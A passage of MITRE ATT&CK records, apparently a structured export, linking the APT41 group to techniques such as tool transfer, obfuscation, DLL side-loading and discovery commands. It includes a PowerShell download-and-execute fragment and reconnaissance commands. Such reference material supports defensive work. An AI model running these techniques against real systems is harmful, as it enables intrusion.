On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as <code>IEX(New-Object Net.WebClient).downloadString()</code> and <code>Invoke-WebRequest</code>. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)

Adversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts.

Files can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
technique_id : T1105
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['File: File Creation', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow', 'Command: Command Execution', 'Network Traffic: Network Connection Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used VMProtected binaries in multiple intrusions.(Citation: FireEye APT41 March 2020)
relationship_id : relationship--f1a9d2b9-f5ec-4119-b3b5-8b46085c01b5
revoked : False
technique : Obfuscated Files or Information
technique_description : Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. 

Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript. 

Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)

Adversaries may also abuse [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1027
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['WMI: WMI Creation', 'Script: Script Execution', 'File: File Creation', 'Module: Module Load', 'Command: Command Execution', 'File: File Metadata', 'Process: OS API Execution', 'Windows Registry: Windows Registry Key Creation', 'Process: Process Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f
relationship_description :  [APT41](https://attack.mitre.org/groups/G0096) used the <code>net share</code> command as part of network reconnaissance.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
relationship_id : relationship--4f6e677d-427b-4342-b35c-57f4f3ad4ff8
revoked : False
technique : Network Share Discovery
technique_description : Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. 

File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the <code>net view \\\\remotesystem</code> command. It can also be used to query shared drives on the local system using <code>net share</code>. For macOS, the <code>sharing -l</code> command lists all shared points used for smb services.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
technique_id : T1135
matrix : mitre-attack
platform : ['macOS', 'Windows', 'Linux']
data_sources : ['Process: OS API Execution', 'Command: Command Execution', 'Process: Process Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has enumerated IP addresses of network resources and used the <code>netstat</code> command as part of network reconnaissance. The group has also used a malware variant, HIGHNOON, to enumerate active RDP sessions.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
relationship_id : relationship--a70bd01d-1d79-44e7-afe4-3a83e5a8d70c
revoked : False
technique : System Network Connections Discovery
technique_description : Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. 

An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview) Similarly, adversaries who gain access to network devices may also perform similar discovery activities to gather information about connected systems and services.

Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and <code>lsof</code> can be used to list current connections. <code>who -a</code> and <code>w</code> can be used to show which users are currently logged in, similar to "net session". Additionally, built-in features native to network devices and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) may be used (e.g. <code>show ip sockets</code>, <code>show tcp brief</code>).(Citation: US-CERT-TA18-106A)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
technique_id : T1049
matrix : mitre-attack
platform : ['Windows', 'IaaS', 'Linux', 'macOS', 'Network']
data_sources : ['Process: OS API Execution', 'Process: Process Creation', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) leveraged the follow exploits in their operations: CVE-2012-0158, CVE-2015-1641, CVE-2017-0199, CVE-2017-11882, and CVE-2019-3396.(Citation: FireEye APT41 Aug 2019) 
relationship_id : relationship--bcbc885e-c1ae-4e69-a72c-22900403bae3
revoked : False
technique : Exploitation for Client Execution
technique_description : Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.

Several types exist:

### Browser-based Exploitation

Web browsers are a common target through [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) and [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.

### Office Applications

Common office and productivity applications such as Microsoft Office are also targeted through [Phishing](https://attack.mitre.org/techniques/T1566). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.

### Common Third-party Applications

Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1203
matrix : mitre-attack
platform : ['Linux', 'Windows', 'macOS']
data_sources : ['Process: Process Creation', 'Application Log: Application Log Content']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used legitimate executables to perform DLL side-loading of their malware.(Citation: FireEye APT41 Aug 2019) 
relationship_id : relationship--ad3eae0f-becd-4ed8-94cf-40a4e1a06a9d
revoked : False
technique : DLL Side-Loading
technique_description : Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).

Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1574.002
matrix : mitre-attack
platform : ['Windows']
data_sources : ['File: File Modification', 'Process: Process Creation', 'Module: Module Load', 'File: File Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) deleted files from the system.(Citation: FireEye APT41 Aug 2019) 
relationship_id : relationship--56b47ce2-9baa-421b-9187-c780615b97de
revoked : False
technique : File Deletion
technique_description : Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.

There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include <code>del</code> on Windows and <code>rm</code> or <code>unlink</code> on Linux and macOS.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1070.004
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Command: Command Execution', 'File: File Deletion']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--a6937325-9321-4e2e-bb2b-3ed2d40b2a9d
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used compiled HTML (.chm) files for targeting.(Citation: FireEye APT41 Aug 2019) 
relationship_id : relationship--c4c08678-eee9-475c-9a67-67b15278ec54
revoked : False
technique : Compiled HTML File
technique_description : Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)

A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1218.001
matrix : mitre-attack
platform : ['Windows']
data_sources : ['File: File Creation', 'Process: Process Creation', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
